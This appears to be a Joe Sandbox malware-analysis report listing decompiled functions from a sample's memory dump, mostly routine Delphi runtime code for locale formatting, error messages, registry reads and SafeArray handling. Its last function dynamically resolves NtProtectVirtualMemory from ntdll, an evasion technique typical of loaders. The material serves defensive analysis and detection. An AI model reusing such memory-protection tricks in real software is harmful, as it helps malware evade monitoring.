Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: Read$AddressHandleModuleProc
String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
API String ID: 1061262613-1650066521
Opcode ID: c928fc199a155c409ccb76d2cb9e83a7341717814cdd4848ded0e893a3f80d66
Instruction ID: 0b8b5b718ad903e798701743cdb8567ff7b47636134eda1c5705eeedd06d5a58
Opcode Fuzzy Hash: c928fc199a155c409ccb76d2cb9e83a7341717814cdd4848ded0e893a3f80d66
Instruction Fuzzy Hash: E131847DA40614BBEB60DB98CC89F7AB7E9AF05318F044150FA1CDB381E730A9548FA1

Uniqueness

Uniqueness Score: -1.00%

Function 0285BDA4 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
threadCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0285BDA4(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x285c06f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0285BCE0();
				E0285A85C(__ebx, __edi, __esi);
				_t196 =  *0x28a58d8;
				if( *0x28a58d8 != 0) {
					E0285AA34(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0285A7A8(_t43, 0, 0x14,  &_v20);
				E028544F4(0x28a580c, _v20);
				E0285A7A8(_t43, 0x285c084, 0x1b,  &_v24);
				 *0x28a5810 = E02857AEC(0x285c084, 0, _t196);
				E0285A7A8(_t132, 0x285c084, 0x1c,  &_v28);
				 *0x28a5811 = E02857AEC(0x285c084, 0, _t196);
				 *0x28a5812 = E0285A7F4(_t132, 0x2c, 0xf);
				 *0x28a5813 = E0285A7F4(_t132, 0x2e, 0xe);
				E0285A7A8(_t132, 0x285c084, 0x19,  &_v32);
				 *0x28a5814 = E02857AEC(0x285c084, 0, _t196);
				 *0x28a5815 = E0285A7F4(_t132, 0x2f, 0x1d);
				E0285A7A8(_t132, "m/d/yy", 0x1f,  &_v40);
				E0285AAE4(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E028544F4(0x28a5818, _v36);
				E0285A7A8(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0285AAE4(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E028544F4(0x28a581c, _v44);
				 *0x28a5820 = E0285A7F4(_t132, 0x3a, 0x1e);
				E0285A7A8(_t132, 0x285c0b8, 0x28,  &_v52);
				E028544F4(0x28a5824, _v52);
				E0285A7A8(_t132, 0x285c0c4, 0x29,  &_v56);
				E028544F4(0x28a5828, _v56);
				E028544A0( &_v12);
				E028544A0( &_v16);
				E0285A7A8(_t132, 0x285c084, 0x25,  &_v60);
				_t104 = E02857AEC(0x285c084, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E02854538( &_v8, 0x285c0dc);
				} else {
					E02854538( &_v8, 0x285c0d0);
				}
				E0285A7A8(_t132, 0x285c084, 0x23,  &_v64);
				_t111 = E02857AEC(0x285c084, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0285A7A8(_t132, 0x285c084, 0x1005,  &_v68);
					if(E02857AEC(0x285c084, 0, _t198) != 0) {
						E02854538( &_v12, 0x285c0f8);
					} else {
						E02854538( &_v16, 0x285c0e8);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E02854824();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E02854824();
				 *0x28a58da = E0285A7F4(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(0x285c076);
				return E028544C4( &_v68, 0x10);
			}

0x0285bda4
0x0285bda4
0x0285bda5
0x0285bda7
0x0285bdac
0x0285bdac
0x0285bdae
0x0285bdb0
0x0285bdb0
0x0285bdb3
0x0285bdb6
0x0285bdb7
0x0285bdbc
0x0285bdbf
0x0285bdc2
0x0285bdc7
0x0285bdcc
0x0285bdd3
0x0285bdd5
0x0285bdd5
0x0285bddf
0x0285bdee
0x0285bdfb
0x0285be10
0x0285be1f
0x0285be34
0x0285be43
0x0285be56
0x0285be69
0x0285be7e
0x0285be8d
0x0285bea0
0x0285beb5
0x0285bec0
0x0285becd
0x0285bee2
0x0285beed
0x0285befa
0x0285bf0d
0x0285bf22
0x0285bf2f
0x0285bf44
0x0285bf51
0x0285bf59
0x0285bf61
0x0285bf76
0x0285bf80
0x0285bf85
0x0285bf87
0x0285bfa0
0x0285bf89
0x0285bf91
0x0285bf91
0x0285bfb5
0x0285bfbf
0x0285bfc4
0x0285bfc6
0x0285bfd8
0x0285bfe9
0x0285c002
0x0285bfeb
0x0285bff3
0x0285bff3
0x0285bfe9
0x0285c007
0x0285c00a
0x0285c00d
0x0285c012
0x0285c01f
0x0285c024
0x0285c027
0x0285c02a
0x0285c02f
0x0285c03c
0x0285c04f
0x0285c056
0x0285c059
0x0285c05c
0x0285c06e

APIs

GetThreadLocale.KERNEL32(00000000,0285C06F,?,?,00000000,00000000), ref: 0285BDDA

Part of subcall function 0285A7A8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0285A7C6

Strings

:mm:ss, xrefs: 0285C02A
AMPM , xrefs: 0285BFFD
:mm, xrefs: 0285C00D
AMPM, xrefs: 0285BFEE
m/d/yy, xrefs: 0285BEA9
mmmm d, yyyy, xrefs: 0285BED6

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: f9d67d0b6ba0243b0fbfa290e42cd87616ee53002a8c08d2654875c70c690701
Instruction ID: 17f421a50b24b3864017f88f94356c3e91f280f58524789cb09b731191fcf5de
Opcode Fuzzy Hash: f9d67d0b6ba0243b0fbfa290e42cd87616ee53002a8c08d2654875c70c690701
Instruction Fuzzy Hash: 6361233CB102689BDB04EBACD89069F77FBDB88300F509535AA01EB345CA79D949CF52

Uniqueness

Uniqueness Score: -1.00%

Function 02854320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E02854320(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x28a304c == 0) {
					if( *0x2877030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x28a3220 == 0xd7b2 &&  *0x28a3228 > 0) {
						 *0x28a3238();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E028543A8, 2,  &_v4, 0);
				}
			}

0x02854328
0x02854388
0x02854398
0x02854398
0x0285439e
0x0285432a
0x02854333
0x02854343
0x02854343
0x0285435f
0x02854380
0x02854380

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028543E7,?,?,028A57C8,?,?,028777A8,02856575,02876305), ref: 02854359
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028543E7,?,?,028A57C8,?,?,028777A8,02856575,02876305), ref: 0285435F
GetStdHandle.KERNEL32(000000F5,028543A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028543E7,?,?,028A57C8), ref: 02854374
WriteFile.KERNEL32(00000000,000000F5,028543A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028543E7,?,?), ref: 0285437A
MessageBoxA.USER32 ref: 02854398

Strings

Error, xrefs: 0285438C
Runtime error at 00000000, xrefs: 02854352, 02854391

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: f46657d1090c1d0403496a402849910e341d2777f0bbdb6eb1f250e450ec52cd
Instruction ID: baabc7b9519e5b52f5ed3a97ab64da10633894f9417da9eac356bcb0c501579c
Opcode Fuzzy Hash: f46657d1090c1d0403496a402849910e341d2777f0bbdb6eb1f250e450ec52cd
Instruction Fuzzy Hash: 5AF0906CEC03A078FB10A7B4AC0AF99670D5740B52F144A85BA28E50D0DBA480C8C722

Uniqueness

Uniqueness Score: -1.00%

Function 0285E570 Relevance: 9.1, APIs: 6, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0285E570(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				signed short* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0285E014(0x80070057);
				}
				_t47 =  *_t91 & 0x0000ffff;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0285CDD4();
					return E0285E014(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 = _t91[4];
					} else {
						_v792 =  *(_t91[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0285D22C();
						_t113 = _t54;
						if(_t113 == 0) {
							E0285DD6C(_t100);
						}
						E0285E3C4(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0285E4E4(_v788 - 1, _t115) != 0) {
								L0285D244();
								E0285E014(_v792);
								L0285D244();
								E0285E014( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0285E514(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0285D234();
							E0285E014(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0285D23C();
							E0285E014(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}

0x0285e570
0x0285e57c
0x0285e582
0x0285e584
0x0285e58e
0x0285e595
0x0285e595
0x0285e59a
0x0285e5a8
0x0285e721
0x0285e728
0x0285e729
0x00000000
0x0285e5ae
0x0285e5b1
0x0285e5c3
0x0285e5b3
0x0285e5b8
0x0285e5b8
0x0285e5d2
0x0285e5de
0x0285e5e1
0x0285e64e
0x0285e654
0x0285e655
0x0285e65b
0x0285e65c
0x0285e65e
0x0285e663
0x0285e667
0x0285e669
0x0285e669
0x0285e674
0x0285e67f
0x0285e68a
0x0285e693
0x0285e696
0x0285e6b2
0x0285e6b9
0x0285e6c4
0x0285e6db
0x0285e6e0
0x0285e6f4
0x0285e6f9
0x0285e70c
0x0285e70c
0x0285e715
0x0285e698
0x0285e698
0x0285e699
0x0285e69f
0x0285e6a5
0x0285e6a7
0x0285e6a9
0x0285e6ac
0x0285e6af
0x0285e6af
0x0285e6b2
0x00000000
0x00000000
0x00000000
0x0285e6b2
0x0285e5e3
0x0285e5e3
0x0285e5e4
0x0285e5e6
0x0285e5ec
0x0285e5ee
0x0285e5fd
0x0285e5fe
0x0285e608
0x0285e609
0x0285e60e
0x0285e619
0x0285e61a
0x0285e624
0x0285e625
0x0285e62a
0x0285e645
0x0285e647
0x0285e648
0x0285e64b
0x0285e64b
0x00000000
0x0285e5ec
0x0285e5e1

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0285E609
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0285E625
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0285E65E
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0285E6DB
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0285E6F4
VariantCopy.OLEAUT32(?,00000000), ref: 0285E729

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: 788cfad8320b4cc412e2131817fe20c930f893f961c76810d35015fa2655debe
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: F951D57D9006299BCB66DB58CC90BD9B7FDAF48340F0441D5EA09E7212DB30AF858F62

Uniqueness

Uniqueness Score: -1.00%

Function 0285355C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0285355C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x2877024 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t14 =  *0x2877024 & 0xffc0 | _v12 & 0x3f;
					 *0x2877024 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(0x28535cd);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x28535d4);
					return RegCloseKey(_v8);
				}
			}

0x0285355d
0x0285355f
0x02853569
0x02853585
0x028535e7
0x028535ea
0x028535f3
0x02853587
0x02853589
0x0285358a
0x0285358f
0x02853592
0x02853595
0x028535b1
0x028535b8
0x028535bb
0x028535be
0x028535cc
0x028535cc

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0285357E
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028535CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028535B1
RegCloseKey.ADVAPI32(?,028535D4,00000000,?,00000004,00000000,028535CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028535C7

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 02853574
FPUMaskValue, xrefs: 028535A8

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 264a6c846420cd92b111ff1b602980435510415f0926d8ba4f5934af6025c60f
Instruction ID: 87d334107ebacb9d8a2b61002ff9bfaaa05eeecfad9bafb8d3206718b7b6c7aa
Opcode Fuzzy Hash: 264a6c846420cd92b111ff1b602980435510415f0926d8ba4f5934af6025c60f
Instruction Fuzzy Hash: 1B01D87DA40328BAFB11DB90CC06FBDB7ECDB08740F1005E1BE04D6680E6749A60DB55

Uniqueness

Uniqueness Score: -1.00%

Function 0285AA34 Relevance: 7.6, APIs: 5, Instructions: 50
threadCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0285AA34(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x285aacb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0285A7A8(GetThreadLocale(), 0x285aae0, 0x100b,  &_v8);
				_t29 = E02857AEC(0x285aae0, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0285A980, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x28a58f8;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0285A9BC, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(0x285aad2);
				return E028544A0( &_v8);
			}

0x0285aa34
0x0285aa37
0x0285aa3c
0x0285aa3d
0x0285aa42
0x0285aa45
0x0285aa5b
0x0285aa6d
0x0285aa77
0x0285aa87
0x0285aa8c
0x0285aa91
0x0285aa96
0x0285aa96
0x0285aa9c
0x0285aa9f
0x0285aa9f
0x0285aab0
0x0285aab0
0x0285aab7
0x0285aaba
0x0285aabd
0x0285aaca

APIs

GetThreadLocale.KERNEL32(?,00000000,0285AACB,?,?,00000000), ref: 0285AA4C

Part of subcall function 0285A7A8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0285A7C6

GetThreadLocale.KERNEL32(00000000,00000004,00000000,0285AACB,?,?,00000000), ref: 0285AA7C
EnumCalendarInfoA.KERNEL32(Function_0000A980,00000000,00000000,00000004), ref: 0285AA87
GetThreadLocale.KERNEL32(00000000,00000003,00000000,0285AACB,?,?,00000000), ref: 0285AAA5
EnumCalendarInfoA.KERNEL32(Function_0000A9BC,00000000,00000000,00000003), ref: 0285AAB0

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 4a81016933e128c42014c9a231fb0f67cf0201705f3eab9a9ea8e9ce616a50be
Instruction ID: d411aaa6a861f070838ebf09223acdf47b68bb1d01dc53347ed9b6c503946012
Opcode Fuzzy Hash: 4a81016933e128c42014c9a231fb0f67cf0201705f3eab9a9ea8e9ce616a50be
Instruction Fuzzy Hash: 32012B7C6402347FF306AB788D51B6F72ADDB45720FD10760FD11E66C0F5689E108A66

Uniqueness

Uniqueness Score: -1.00%

Function 0285AAE4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
threadCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0285AAE4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t45;
				void* _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				void* _t83;
				void* _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x285acb4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E028544A0(__edx);
				E0285A7A8(GetThreadLocale(), 0x285accc, 0x1009,  &_v12);
				if(E02857AEC(0x285accc, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						__eflags = _t92 - E02854760(_t124);
						if(__eflags > 0) {
							break;
						}
						asm("bt [0x2877808], eax");
						if(__eflags >= 0) {
							_t45 = E028580A4(_t124 + _t92 - 1, 2, 0x285acd0);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E028580A4(_t124 + _t92 - 1, 4, 0x285ace0);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E028580A4(_t124 + _t92 - 1, 2, 0x285acf8);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E0285476C(_t122, 0x285ad10);
											L26:
											_t92 = _t92 + 1;
											__eflags = _t92;
											continue;
										}
										__eflags = _t51 != 0x20;
										if(_t51 != 0x20) {
											E02854688();
											E0285476C(_t122, _v24);
											goto L26;
										}
										goto L24;
									}
									E0285476C(_t122, 0x285ad04);
									_t92 = _t92 + 1;
									goto L26;
								}
								E0285476C(_t122, 0x285acf0);
								_t92 = _t92 + 3;
								goto L26;
							}
							E0285476C(_t122, 0x285acdc);
							_t92 = _t92 + 1;
							goto L26;
						}
						_v8 = E0285BAC8(_t124, _t92);
						E028549C4(_t124, _v8, _t92,  &_v20);
						E0285476C(_t122, _v20);
						_t92 = _t92 + _v8;
					}
					L28:
					_pop(_t111);
					 *[fs:eax] = _t111;
					_push(0x285acbb);
					return E028544C4( &_v24, 4);
				}
				_t75 =  *0x28a58d0; // 0x9
				_t76 = _t75 - 4;
				if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
					_t77 = 1;
				} else {
					_t77 = 0;
				}
				if(_t77 == 0) {
					E028544F4(_t122, _t124);
				} else {
					while(_t92 <= E02854760(_t124)) {
						_t83 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x47;
						__eflags = _t83;
						if(_t83 != 0) {
							__eflags = _t83 != 0x20;
							if(_t83 != 0x20) {
								E02854688();
								E0285476C(_t122, _v16);
							}
						}
						_t92 = _t92 + 1;
						__eflags = _t92;
					}
				}
			}

0x0285aae4
0x0285aae9
0x0285aaea
0x0285aaeb
0x0285aaec
0x0285aaed
0x0285aaf1
0x0285aaf3
0x0285aaf7
0x0285aaf8
0x0285aafd
0x0285ab00
0x0285ab03
0x0285ab0a
0x0285ab22
0x0285ab3a
0x0285ac8a
0x0285ac91
0x0285ac93
0x00000000
0x00000000
0x0285aba9
0x0285abb0
0x0285abee
0x0285abf3
0x0285abf5
0x0285ac17
0x0285ac1c
0x0285ac1e
0x0285ac3f
0x0285ac44
0x0285ac46
0x0285ac5c
0x0285ac5c
0x0285ac5e
0x0285ac64
0x0285ac6b
0x0285ac89
0x0285ac89
0x0285ac89
0x00000000
0x0285ac89
0x0285ac60
0x0285ac62
0x0285ac7a
0x0285ac84
0x00000000
0x0285ac84
0x00000000
0x0285ac62
0x0285ac4f
0x0285ac54
0x00000000
0x0285ac54
0x0285ac27
0x0285ac2c
0x00000000
0x0285ac2c
0x0285abfe
0x0285ac03
0x00000000
0x0285ac03
0x0285abbb
0x0285abc9
0x0285abd3
0x0285abd8
0x0285abd8
0x0285ac99
0x0285ac9b
0x0285ac9e
0x0285aca1
0x0285acb3
0x0285acb3
0x0285ab40
0x0285ab45
0x0285ab48
0x0285ab56
0x0285ab52
0x0285ab52
0x0285ab52
0x0285ab5a
0x0285ab97
0x0285ab5c
0x0285ab83
0x0285ab63
0x0285ab63
0x0285ab65
0x0285ab67
0x0285ab69
0x0285ab73
0x0285ab7d
0x0285ab7d
0x0285ab69
0x0285ab82
0x0285ab82
0x0285ab82
0x0285ab8e

APIs

GetThreadLocale.KERNEL32(?,00000000,0285ACB4,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0285AB13

Part of subcall function 0285A7A8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0285A7C6

Strings

eeee, xrefs: 0285AC22
ggg, xrefs: 0285ABF9
yyyy, xrefs: 0285AC09

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 50f045933c01d92ecc292e344d8b3c856dc0bc998c356eaee27827067247b1d4
Instruction ID: 914ca61350613707ab5a24153bf7908bc8535ec09764557ea79ade852103836e
Opcode Fuzzy Hash: 50f045933c01d92ecc292e344d8b3c856dc0bc998c356eaee27827067247b1d4
Instruction Fuzzy Hash: FE41033C7045394BE719AAAD88C027EB7EBEB85304B944726DC41D7344EA39ED468A63

Uniqueness

Uniqueness Score: -1.00%

Function 02867A60 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E02867A60(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {

				 *0x28a631c = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtProtectVirtualMemory");
				 *0x28a631c(_a4, _a8, _a12, _a16, _a20);
				return 1;
			}

0x02867a78
0x02867a91
0x02867a9a

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 02867A6D
GetProcAddress.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 02867A73

Strings

C:\Windows\System32\ntdll.dll, xrefs: 02867A68
NtProtectVirtualMemory, xrefs: 02867A63

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
